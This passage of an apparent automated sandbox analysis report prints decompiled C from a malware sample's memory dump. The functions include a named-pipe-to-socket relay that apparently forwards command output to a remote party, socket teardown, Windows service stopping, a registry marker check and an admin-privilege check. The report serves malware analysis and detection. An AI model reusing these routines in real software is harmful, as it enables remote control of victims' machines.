                                                            				intOrPtr _t57;
                                                            				signed int _t58;
                                                            
                                                            				_t26 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t26 ^ (_t58 & 0xfffffff8) - 0x0000042c;
                                                            				_t48 = PeekNamedPipe;
                                                            				_t57 = _a4;
                                                            				_v1068 = 0;
                                                            				while(1) {
                                                            					L1:
                                                            					Sleep(0x64);
                                                            					if(PeekNamedPipe( *(_t57 + 0xc),  &_v1036, 0x400,  &_v1068,  &_v1064, 0) == 0) {
                                                            						continue;
                                                            					}
                                                            					L2:
                                                            					while(_v1068 > 0) {
                                                            						_t55 = LocalAlloc(0x40, _v1064);
                                                            						ReadFile( *(_t57 + 0xc), _t55, _v1064,  &_v1068, 0);
                                                            						_t53 = _t55;
                                                            						E04646470(_t48,  &_v1060, _t55, _t55, _t57, _v1068);
                                                            						_t51 =  >=  ? _v1060 :  &_v1060;
                                                            						_push(0x3f);
                                                            						_push(_v1044 + _v1044);
                                                            						_push( >=  ? _v1060 :  &_v1060);
                                                            						E04631C60( *((intOrPtr*)(_t57 + 4)));
                                                            						LocalFree(_t55);
                                                            						_t40 = _v1056;
                                                            						if(_v1056 >= 8) {
                                                            							E04633540(_t48, _t53, _t55, _v1061, _t40 + 1);
                                                            						}
                                                            						if(PeekNamedPipe( *(_t57 + 0xc),  &_v1037, 0x400,  &_v1069,  &_v1065, 0) != 0) {
                                                            							continue;
                                                            						} else {
                                                            							while(1) {
                                                            								L1:
                                                            								Sleep(0x64);
                                                            								if(PeekNamedPipe( *(_t57 + 0xc),  &_v1036, 0x400,  &_v1068,  &_v1064, 0) == 0) {
                                                            									continue;
                                                            								}
                                                            								goto L2;
                                                            								do {
                                                            									goto L1;
                                                            								} while (PeekNamedPipe( *(_t57 + 0xc),  &_v1036, 0x400,  &_v1068,  &_v1064, 0) == 0);
                                                            								goto L2;
                                                            							}
                                                            						}
                                                            					}
                                                            					L1:
                                                            					Sleep(0x64);
                                                            				}
                                                            			}




















                                                            0x0464400c
                                                            0x04644013
                                                            0x0464401b
                                                            0x04644022
                                                            0x04644026
                                                            0x04644030
                                                            0x04644030
                                                            0x04644032
                                                            0x04644055
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04644057
                                                            0x0464406c
                                                            0x0464407b
                                                            0x04644085
                                                            0x0464408b
                                                            0x0464409d
                                                            0x046440a4
                                                            0x046440a6
                                                            0x046440a7
                                                            0x046440ab
                                                            0x046440b1
                                                            0x046440b7
                                                            0x046440be
                                                            0x046440c6
                                                            0x046440c6
                                                            0x046440e8
                                                            0x00000000
                                                            0x046440ee
                                                            0x04644030
                                                            0x04644030
                                                            0x04644032
                                                            0x04644055
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04644030
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04644030
                                                            0x04644030
                                                            0x046440e8
                                                            0x04644030
                                                            0x04644032
                                                            0x04644053

                                                            APIs
                                                            • Sleep.KERNEL32(00000064), ref: 04644032
                                                            • PeekNamedPipe.KERNEL32(?,?,00000400,?,?,00000000), ref: 04644051
                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 04644064
                                                            • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0464407B
                                                            • LocalFree.KERNEL32(00000000,?,?,0000003F,?,?,?,?,?,?,?,00000000), ref: 046440B1
                                                            • PeekNamedPipe.KERNEL32(?,?,00000400,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 046440E4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LocalNamedPeekPipe$AllocFileFreeReadSleep
                                                            • String ID:
                                                            • API String ID: 2866027955-0
                                                            • Opcode ID: b890d2a5d9b55653edc2485c542ee896a00301d404a23d6e96d93647f5173239
                                                            • Instruction ID: e279ba1885b240d6775f5828f372e0299dfcc0d6e68a194762f877b0d7bcfa2d
                                                            • Opcode Fuzzy Hash: b890d2a5d9b55653edc2485c542ee896a00301d404a23d6e96d93647f5173239
                                                            • Instruction Fuzzy Hash: 52212572114301AFE714DF54DC85FABB7E8EB88700F00491DFA95C2190EB34E919CB66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WSAEventSelect.WS2_32(?,?,00000023), ref: 0464E2E8
                                                            • WSAGetLastError.WS2_32(?,0464E1F3,00000010), ref: 0464E2F3
                                                            • SetLastError.KERNEL32(00000000,?,0464E1F3,00000010), ref: 0464E328
                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 0464E343
                                                            • WSAGetLastError.WS2_32(?,0464E1F3,00000010), ref: 0464E34E
                                                            • GetLastError.KERNEL32(?,0464E1F3,00000010), ref: 0464E369
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$EventSelectsend
                                                            • String ID:
                                                            • API String ID: 259408233-0
                                                            • Opcode ID: 1ef2dd1c79c9ef8f050df56a44149fefd32dc2ad3740406c8d7fde521d466280
                                                            • Instruction ID: 9c5c4791b8bc9771c70cfc8416b9d552e71e007fd6b8988df42dfe572dfe814c
                                                            • Opcode Fuzzy Hash: 1ef2dd1c79c9ef8f050df56a44149fefd32dc2ad3740406c8d7fde521d466280
                                                            • Instruction Fuzzy Hash: 3B2172712007009FE7359FA4E84CB46BBF5FB54315F104A1DE65AC66D0E7BAE8049F94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 18%
                                                            			E0464E6F0(intOrPtr* __ecx) {
                                                            				void* __ebx;
                                                            				void* __edi;
                                                            				intOrPtr _t29;
                                                            				intOrPtr _t30;
                                                            				long _t36;
                                                            				intOrPtr* _t45;
                                                            
                                                            				_t45 = __ecx;
                                                            				_t36 = GetCurrentThreadId();
                                                            				if( *((intOrPtr*)(_t45 + 0x50)) == 3) {
                                                            					L14:
                                                            					 *((intOrPtr*)(_t45 + 0x48)) = 1;
                                                            					SetLastError(0x139f);
                                                            					return 0;
                                                            				} else {
                                                            					E0464EC90(_t45 + 0x148);
                                                            					if( *((intOrPtr*)( *_t45 + 0x24))() == 0) {
                                                            						 *((intOrPtr*)(_t45 + 0x148)) = 0;
                                                            						goto L14;
                                                            					} else {
                                                            						 *((intOrPtr*)(_t45 + 0x50)) = 2;
                                                            						_push(_t36);
                                                            						 *((intOrPtr*)(_t45 + 0x148)) = 0;
                                                            						E0464E8C0(_t36, _t45, _t45);
                                                            						if( *((intOrPtr*)( *_t45 + 0x40))() != 0) {
                                                            							if( *((intOrPtr*)(_t45 + 0x18)) != 0) {
                                                            								__imp__#19( *((intOrPtr*)(_t45 + 0x1c)), 0x467f78c, 0x10, 0);
                                                            							}
                                                            							 *((intOrPtr*)(_t45 + 0x4c)) = 0;
                                                            						}
                                                            						if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                                            							 *((intOrPtr*)( *_t45 + 0x90))( *((intOrPtr*)(_t45 + 0x10)),  *((intOrPtr*)(_t45 + 0x14)));
                                                            						}
                                                            						_t29 =  *((intOrPtr*)(_t45 + 0x20));
                                                            						if(_t29 != 0) {
                                                            							__imp__WSACloseEvent(_t29);
                                                            							 *((intOrPtr*)(_t45 + 0x20)) = 0;
                                                            						}
                                                            						_t30 =  *((intOrPtr*)(_t45 + 0x1c));
                                                            						if(_t30 != 0xffffffff) {
                                                            							__imp__#22(_t30, 1);
                                                            							__imp__#3( *((intOrPtr*)(_t45 + 0x1c)));
                                                            							 *((intOrPtr*)(_t45 + 0x1c)) = 0xffffffff;
                                                            						}
                                                            						 *((intOrPtr*)( *_t45 + 0xb8))();
                                                            						return 1;
                                                            					}
                                                            				}
                                                            			}









                                                            0x0464e6f3
                                                            0x0464e6ff
                                                            0x0464e701
                                                            0x0464e7cd
                                                            0x0464e7d2
                                                            0x0464e7d9
                                                            0x0464e7e4
                                                            0x0464e707
                                                            0x0464e70d
                                                            0x0464e71b
                                                            0x0464e7c3
                                                            0x00000000
                                                            0x0464e721
                                                            0x0464e721
                                                            0x0464e72a
                                                            0x0464e72b
                                                            0x0464e735
                                                            0x0464e743
                                                            0x0464e749
                                                            0x0464e757
                                                            0x0464e757
                                                            0x0464e75d
                                                            0x0464e75d
                                                            0x0464e768
                                                            0x0464e774
                                                            0x0464e774
                                                            0x0464e77a
                                                            0x0464e77f
                                                            0x0464e782
                                                            0x0464e788
                                                            0x0464e788
                                                            0x0464e78f
                                                            0x0464e795
                                                            0x0464e79a
                                                            0x0464e7a3
                                                            0x0464e7a9
                                                            0x0464e7a9
                                                            0x0464e7b4
                                                            0x0464e7c2
                                                            0x0464e7c2
                                                            0x0464e71b

                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 0464E6F5
                                                            • SetLastError.KERNEL32(0000139F,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8,04638B6E,00000000,?), ref: 0464E7D9
                                                              • Part of subcall function 0464EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0464ECA5
                                                              • Part of subcall function 0464EC90: SwitchToThread.KERNEL32(?,?,00000000,0464E712,?,00000000,04638425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,046387F8), ref: 0464ECBD
                                                              • Part of subcall function 0464E8C0: SetEvent.KERNEL32(?,?,04638B6E,0467E024,?), ref: 0464E8E7
                                                              • Part of subcall function 0464E8C0: CloseHandle.KERNEL32(00000000,?,04638B6E,0467E024,?), ref: 0464E90A
                                                            • send.WS2_32(?,0467F78C,00000010,00000000), ref: 0464E757
                                                            • WSACloseEvent.WS2_32(00000000), ref: 0464E782
                                                            • shutdown.WS2_32(?,00000001), ref: 0464E79A
                                                            • closesocket.WS2_32(?), ref: 0464E7A3
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEventThread$CompareCurrentErrorExchangeHandleInterlockedLastSwitchclosesocketsendshutdown
                                                            • String ID:
                                                            • API String ID: 4222243704-0
                                                            • Opcode ID: 3c2fd36e4608478b15de0208799ef4aab6c761c5fffa6c6a5f2c062bc79ef59e
                                                            • Instruction ID: 776486bb958fae7bb37aacd8eb5516ea87b186b1da2a74e565ae5e66279b9d35
                                                            • Opcode Fuzzy Hash: 3c2fd36e4608478b15de0208799ef4aab6c761c5fffa6c6a5f2c062bc79ef59e
                                                            • Instruction Fuzzy Hash: C6211074300602EFDB289F25D88CBA9BBA5FF94325F144618E115876D0EB76F8A5CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 94%
                                                            			E04652150(intOrPtr* __ecx, intOrPtr _a4, void* _a8) {
                                                            				intOrPtr* _v8;
                                                            				long _t25;
                                                            				void* _t36;
                                                            				intOrPtr _t39;
                                                            				void* _t45;
                                                            				intOrPtr* _t48;
                                                            				struct _CRITICAL_SECTION* _t51;
                                                            
                                                            				_push(__ecx);
                                                            				_t48 = __ecx;
                                                            				_t36 = 0xff;
                                                            				_t45 = _a8;
                                                            				_v8 = __ecx;
                                                            				if( *((intOrPtr*)(__ecx + 0xc)) != 0) {
                                                            					_t39 = _a4;
                                                            					if(_t39 != 0 &&  *((intOrPtr*)(_t39 + 0x30)) != 0) {
                                                            						_t29 =  ==  ? 0x6c : 0x54;
                                                            						_t51 = ( ==  ? 0x6c : 0x54) + _t39;
                                                            						EnterCriticalSection(_t51);
                                                            						if( *((intOrPtr*)(_a4 + 0x30)) != 0) {
                                                            							SetLastError(0);
                                                            							_t36 =  *((intOrPtr*)( *_v8 + 0xec))(_a4,  *((intOrPtr*)(_t45 + 0x20)),  *((intOrPtr*)(_t45 + 0x1c)));
                                                            						}
                                                            						LeaveCriticalSection(_t51);
                                                            						_t48 = _v8;
                                                            					}
                                                            				} else {
                                                            					SetLastError(0);
                                                            					_t36 =  *((intOrPtr*)( *_t48 + 0xec))(_a4,  *((intOrPtr*)(_t45 + 0x20)),  *((intOrPtr*)(_t45 + 0x1c)));
                                                            				}
                                                            				_t19 = _t45 + 0x28; // 0x28
                                                            				if(InterlockedDecrement(_t19) == 0) {
                                                            					_t25 = E0464C930(_t48 + 0xb0, _t45);
                                                            					if(_t25 == 0) {
                                                            						HeapFree( *( *(_t45 + 0x14)), _t25, _t45);
                                                            					}
                                                            				}
                                                            				return _t36;
                                                            			}










                                                            0x04652153
                                                            0x04652156
                                                            0x04652158
                                                            0x0465215e
                                                            0x04652161
                                                            0x04652169
                                                            0x0465218a
                                                            0x0465218f
                                                            0x046521a4
                                                            0x046521a7
                                                            0x046521ab
                                                            0x046521b8
                                                            0x046521bc
                                                            0x046521d6
                                                            0x046521d6
                                                            0x046521d9
                                                            0x046521df
                                                            0x046521df
                                                            0x0465216b
                                                            0x0465216d
                                                            0x04652186
                                                            0x04652186
                                                            0x046521e2
                                                            0x046521ee
                                                            0x046521f7
                                                            0x046521fe
                                                            0x04652207
                                                            0x04652207
                                                            0x046521fe
                                                            0x04652215

                                                            APIs
                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,046537D4,00000000,?,?,04653568,?,?,?,?,00000000), ref: 0465216D
                                                            • RtlEnterCriticalSection.NTDLL(0000006C), ref: 046521AB
                                                            • SetLastError.KERNEL32(00000000,?,046537D4,00000000,?,?,04653568,?,?,?,?,00000000), ref: 046521BC
                                                            • RtlLeaveCriticalSection.NTDLL(0000006C), ref: 046521D9
                                                            • InterlockedDecrement.KERNEL32(00000028), ref: 046521E6
                                                            • HeapFree.KERNEL32(?,00000000,00000000,00000000,?,046537D4,00000000,?,?,04653568,?,?,?,?,00000000), ref: 04652207
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$DecrementEnterFreeHeapInterlockedLeave
                                                            • String ID:
                                                            • API String ID: 2534375417-0
                                                            • Opcode ID: 62fb9003ab9c2f6b69dd278fd89795915a1b8c534e373a6ed2bb850f5eeefee7
                                                            • Instruction ID: ae08b8fd47780c7780727876fe11ced002160d4839d6d95d7b0fa8eba9310dc7
                                                            • Opcode Fuzzy Hash: 62fb9003ab9c2f6b69dd278fd89795915a1b8c534e373a6ed2bb850f5eeefee7
                                                            • Instruction Fuzzy Hash: 7E218C35200105EFDB149F95D858FAABBA9FF58311F0080AAFE0997620EB31AD11CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E046437E0(void* __ebx, short* __ecx, void* __edi, void* __esi) {
                                                            				signed int _v8;
                                                            				intOrPtr _v32;
                                                            				struct _SERVICE_STATUS _v36;
                                                            				signed int _t6;
                                                            				void* _t19;
                                                            				short* _t25;
                                                            				void* _t26;
                                                            				signed int _t29;
                                                            
                                                            				_t6 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t6 ^ _t29;
                                                            				_t25 = __ecx;
                                                            				_t19 = OpenSCManagerW(0, 0, 0xf003f);
                                                            				if(_t19 != 0) {
                                                            					_t26 = OpenServiceW(_t19, _t25, 0x24);
                                                            					if(_t26 != 0) {
                                                            						if(QueryServiceStatus(_t26,  &_v36) != 0) {
                                                            							if(_v32 != 1) {
                                                            								ControlService(_t26, 1,  &_v36);
                                                            								_t28 =  !=  ? 1 : 0;
                                                            							}
                                                            						}
                                                            						CloseServiceHandle(_t26);
                                                            					}
                                                            					CloseServiceHandle(_t19);
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t29);
                                                            			}











                                                            0x046437e6
                                                            0x046437ed
                                                            0x046437fa
                                                            0x04643804
                                                            0x04643808
                                                            0x04643814
                                                            0x04643818
                                                            0x04643827
                                                            0x0464382d
                                                            0x0464383d
                                                            0x0464384a
                                                            0x0464384a
                                                            0x0464382d
                                                            0x0464384e
                                                            0x0464384e
                                                            0x04643855
                                                            0x04643855
                                                            0x0464386d

                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 046437FE
                                                            • OpenServiceW.ADVAPI32(00000000,?,00000024), ref: 0464380E
                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,00000024), ref: 0464381F
                                                            • ControlService.ADVAPI32(00000000,00000001,?,?,00000024), ref: 0464383D
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 0464384E
                                                            • CloseServiceHandle.ADVAPI32(00000000,?,00000024), ref: 04643855
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseHandleOpen$ControlManagerQueryStatus
                                                            • String ID:
                                                            • API String ID: 3062456870-0
                                                            • Opcode ID: 97e82fdc69f6b09383497c62ee61654d8c5d804e5c6f24996753c4db7a98bef5
                                                            • Instruction ID: d9c88d63bb1659623b7c04b54c72b1825e0b44f4f208cd778a368762222640bf
                                                            • Opcode Fuzzy Hash: 97e82fdc69f6b09383497c62ee61654d8c5d804e5c6f24996753c4db7a98bef5
                                                            • Instruction Fuzzy Hash: FC016132701214ABEB145B659C8CEBBBBBCEB89A51B01102DED06D2241FE689C458760
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 58%
                                                            			E04668930(void* __ebx, void* __ecx, void* __edx) {
                                                            				void* __edi;
                                                            				void* __esi;
                                                            				intOrPtr _t2;
                                                            				void* _t3;
                                                            				void* _t4;
                                                            				intOrPtr _t9;
                                                            				void* _t11;
                                                            				void* _t20;
                                                            				void* _t21;
                                                            				void* _t23;
                                                            				void* _t25;
                                                            				void* _t27;
                                                            				void* _t29;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            				long _t36;
                                                            				long _t37;
                                                            				void* _t40;
                                                            
                                                            				_t29 = __edx;
                                                            				_t23 = __ecx;
                                                            				_t20 = __ebx;
                                                            				_t36 = GetLastError();
                                                            				_t2 =  *0x468403c; // 0x8
                                                            				_t42 = _t2 - 0xffffffff;
                                                            				if(_t2 == 0xffffffff) {
                                                            					L2:
                                                            					_t3 = E04668535(_t23, 1, 0x364);
                                                            					_t31 = _t3;
                                                            					_pop(_t25);
                                                            					if(_t31 != 0) {
                                                            						_t4 = E04669171(_t25, _t36, __eflags,  *0x468403c, _t31);
                                                            						__eflags = _t4;
                                                            						if(_t4 != 0) {
                                                            							E04668776(_t25, _t31, 0x468742c);
                                                            							E046684AD(0);
                                                            							_t40 = _t40 + 0xc;
                                                            							__eflags = _t31;
                                                            							if(_t31 == 0) {
                                                            								goto L9;
                                                            							} else {
                                                            								goto L8;
                                                            							}
                                                            						} else {
                                                            							_push(_t31);
                                                            							goto L4;
                                                            						}
                                                            					} else {
                                                            						_push(_t3);
                                                            						L4:
                                                            						E046684AD();
                                                            						_pop(_t25);
                                                            						L9:
                                                            						SetLastError(_t36);
                                                            						E04667199(_t20, _t25, _t29, _t31, _t36);
                                                            						asm("int3");
                                                            						_push(_t20);
                                                            						_push(_t36);
                                                            						_push(_t31);
                                                            						_t37 = GetLastError();
                                                            						_t21 = 0;
                                                            						_t9 =  *0x468403c; // 0x8
                                                            						_t45 = _t9 - 0xffffffff;
                                                            						if(_t9 == 0xffffffff) {
                                                            							L12:
                                                            							_t32 = E04668535(_t25, 1, 0x364);
                                                            							_pop(_t27);
                                                            							if(_t32 != 0) {
                                                            								_t11 = E04669171(_t27, _t37, __eflags,  *0x468403c, _t32);
                                                            								__eflags = _t11;
                                                            								if(_t11 != 0) {
                                                            									E04668776(_t27, _t32, 0x468742c);
                                                            									E046684AD(_t21);
                                                            									__eflags = _t32;
                                                            									if(_t32 != 0) {
                                                            										goto L19;
                                                            									} else {
                                                            										goto L18;
                                                            									}
                                                            								} else {
                                                            									_push(_t32);
                                                            									goto L14;
                                                            								}
                                                            							} else {
                                                            								_push(_t21);
                                                            								L14:
                                                            								E046684AD();
                                                            								L18:
                                                            								SetLastError(_t37);
                                                            							}
                                                            						} else {
                                                            							_t32 = E0466911B(_t25, _t37, _t45, _t9);
                                                            							if(_t32 != 0) {
                                                            								L19:
                                                            								SetLastError(_t37);
                                                            								_t21 = _t32;
                                                            							} else {
                                                            								goto L12;
                                                            							}
                                                            						}
                                                            						return _t21;
                                                            					}
                                                            				} else {
                                                            					_t31 = E0466911B(_t23, _t36, _t42, _t2);
                                                            					if(_t31 != 0) {
                                                            						L8:
                                                            						SetLastError(_t36);
                                                            						return _t31;
                                                            					} else {
                                                            						goto L2;
                                                            					}
                                                            				}
                                                            			}





















                                                            0x04668930
                                                            0x04668930
                                                            0x04668930
                                                            0x0466893a
                                                            0x0466893c
                                                            0x04668941
                                                            0x04668944
                                                            0x04668952
                                                            0x04668959
                                                            0x0466895e
                                                            0x04668961
                                                            0x04668964
                                                            0x04668976
                                                            0x0466897b
                                                            0x0466897d
                                                            0x04668988
                                                            0x0466898f
                                                            0x04668994
                                                            0x04668997
                                                            0x04668999
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0466897f
                                                            0x0466897f
                                                            0x00000000
                                                            0x0466897f
                                                            0x04668966
                                                            0x04668966
                                                            0x04668967
                                                            0x04668967
                                                            0x0466896c
                                                            0x046689a7
                                                            0x046689a8
                                                            0x046689ae
                                                            0x046689b3
                                                            0x046689b6
                                                            0x046689b7
                                                            0x046689b8
                                                            0x046689bf
                                                            0x046689c1
                                                            0x046689c3
                                                            0x046689c8
                                                            0x046689cb
                                                            0x046689d9
                                                            0x046689e5
                                                            0x046689e8
                                                            0x046689eb
                                                            0x046689fd
                                                            0x04668a02
                                                            0x04668a04
                                                            0x04668a0f
                                                            0x04668a15
                                                            0x04668a1d
                                                            0x04668a1f
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04668a06
                                                            0x04668a06
                                                            0x00000000
                                                            0x04668a06
                                                            0x046689ed
                                                            0x046689ed
                                                            0x046689ee
                                                            0x046689ee
                                                            0x04668a21
                                                            0x04668a22
                                                            0x04668a22
                                                            0x046689cd
                                                            0x046689d3
                                                            0x046689d7
                                                            0x04668a2a
                                                            0x04668a2b
                                                            0x04668a31
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x046689d7
                                                            0x04668a38
                                                            0x04668a38
                                                            0x04668946
                                                            0x0466894c
                                                            0x04668950
                                                            0x0466899b
                                                            0x0466899c
                                                            0x046689a6
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x04668950

                                                            APIs
                                                            • GetLastError.KERNEL32(?,00000000,0465EFC2,00000000,00000002,?,0465FC23,04660991,00000000,?,00000002), ref: 04668934
                                                            • _free.LIBCMT ref: 04668967
                                                            • _free.LIBCMT ref: 0466898F
                                                            • SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04660991,00000000,?,0464707A,00000002), ref: 0466899C
                                                            • SetLastError.KERNEL32(00000000,00000000,?,00000002,?,?,?,?,?,04660991,00000000,?,0464707A,00000002), ref: 046689A8
                                                            • _abort.LIBCMT ref: 046689AE
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorLast$_free$_abort
                                                            • String ID:
                                                            • API String ID: 3160817290-0
                                                            • Opcode ID: 893f654549eb2138487f035143a978ff1169656ba81ea56c24c5b738c624453b
                                                            • Instruction ID: 0efa8b5ee768911b7bffd78f26fd68f21c513e0b4e95b46cbdda49cb9b9a40c1
                                                            • Opcode Fuzzy Hash: 893f654549eb2138487f035143a978ff1169656ba81ea56c24c5b738c624453b
                                                            • Instruction Fuzzy Hash: 27F0D1362066017BE7113B79BC08A2B2629CBC1779F24822CF81BA3284FE34AC024466
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 91%
                                                            			E046362B0(void* __ebx, intOrPtr* __ecx, void* __edi) {
                                                            				void* _v8;
                                                            				void* _v12;
                                                            				void* __esi;
                                                            				void _t16;
                                                            				intOrPtr _t18;
                                                            				void* _t22;
                                                            				long _t27;
                                                            				void* _t34;
                                                            				char _t40;
                                                            				void _t41;
                                                            				intOrPtr* _t46;
                                                            				void* _t56;
                                                            
                                                            				_t44 = __edi;
                                                            				_t36 = __ebx;
                                                            				_t16 =  *0x46865f8; // 0x38f
                                                            				_t46 = __ecx;
                                                            				_t17 =  !=  ? 0x2710 : _t16;
                                                            				 *((intOrPtr*)(__ecx + 0x30)) =  !=  ? 0x2710 : _t16;
                                                            				_t18 = L0464ABF0();
                                                            				 *((intOrPtr*)(_t46 + 0x2c)) = _t18;
                                                            				_t55 = _t18;
                                                            				if(_t18 != 0) {
                                                            					_t41 =  *0x46865f8; // 0x38f
                                                            					E04646C70(__ebx, _t41, __edi, _t46, _t55);
                                                            					_t34 = E04646B70(__ebx, __edi, _t46, _t55);
                                                            					_t56 = _t34;
                                                            					_t35 =  ==  ?  *0x46865f8 : _t34;
                                                            					 *((intOrPtr*)(_t46 + 0x30)) =  ==  ?  *0x46865f8 : _t34;
                                                            				}
                                                            				 *((intOrPtr*)(_t46 + 0x28)) = L04655B14(_t46, _t56, 0x120);
                                                            				E04645A50(_t19, _t44, _t46);
                                                            				_t40 = E04646780(_t19, _t44, _t46);
                                                            				_t5 = _t46 + 4; // 0x4
                                                            				_t22 = _t5;
                                                            				 *_t46 = _t40;
                                                            				if(_t40 != 0) {
                                                            					__eflags =  *_t40 + 0x28;
                                                            					L0463C3E0(_t36, _t40,  *_t40 + 0x28, _t44, _t46, _t22);
                                                            				} else {
                                                            					asm("movaps xmm0, [0x467f960]");
                                                            					asm("movups [eax], xmm0");
                                                            					asm("movups [eax+0x10], xmm0");
                                                            					 *((char*)(_t22 + 0x20)) = 0x30;
                                                            					 *((char*)(_t22 + 0x20)) = _t40;
                                                            				}
                                                            				 *((intOrPtr*)(_t46 + 0x34)) = E04642F10;
                                                            				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\Classes\\.codein", 0, 0x20119,  &_v8) != 0) {
                                                            					_t27 = RegOpenKeyExW(0x80000001, L"SOFTWARE\\Classes\\.codein", 0, 0x20119,  &_v12);
                                                            					__eflags = _t27;
                                                            					if(_t27 != 0) {
                                                            						 *(_t46 + 0x38) = 0;
                                                            						return _t46;
                                                            					} else {
                                                            						RegCloseKey(_v12);
                                                            						 *(_t46 + 0x38) = 1;
                                                            						return _t46;
                                                            					}
                                                            				} else {
                                                            					RegCloseKey(_v8);
                                                            					 *(_t46 + 0x38) = 1;
                                                            					return _t46;
                                                            				}
                                                            			}















                                                            0x046362b0
                                                            0x046362b0
                                                            0x046362b3
                                                            0x046362c3
                                                            0x046362ca
                                                            0x046362cd
                                                            0x046362d0
                                                            0x046362d5
                                                            0x046362d8
                                                            0x046362da
                                                            0x046362dc
                                                            0x046362e2
                                                            0x046362e7
                                                            0x046362ec
                                                            0x046362ee
                                                            0x046362f5
                                                            0x046362f5
                                                            0x04636305
                                                            0x0463630a
                                                            0x04636314
                                                            0x04636316
                                                            0x04636316
                                                            0x04636319
                                                            0x0463631d
                                                            0x04636339
                                                            0x0463633c
                                                            0x0463631f
                                                            0x0463631f
                                                            0x04636326
                                                            0x04636329
                                                            0x0463632d
                                                            0x04636331
                                                            0x04636331
                                                            0x04636347
                                                            0x04636368
                                                            0x04636396
                                                            0x0463639c
                                                            0x0463639e
                                                            0x046363b7
                                                            0x046363c4
                                                            0x046363a0
                                                            0x046363a3
                                                            0x046363a9
                                                            0x046363b6
                                                            0x046363b6
                                                            0x0463636a
                                                            0x0463636d
                                                            0x04636373
                                                            0x04636380
                                                            0x04636380

                                                            APIs
                                                              • Part of subcall function 0464ABF0: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0464AC2E
                                                              • Part of subcall function 0464ABF0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 0464AC41
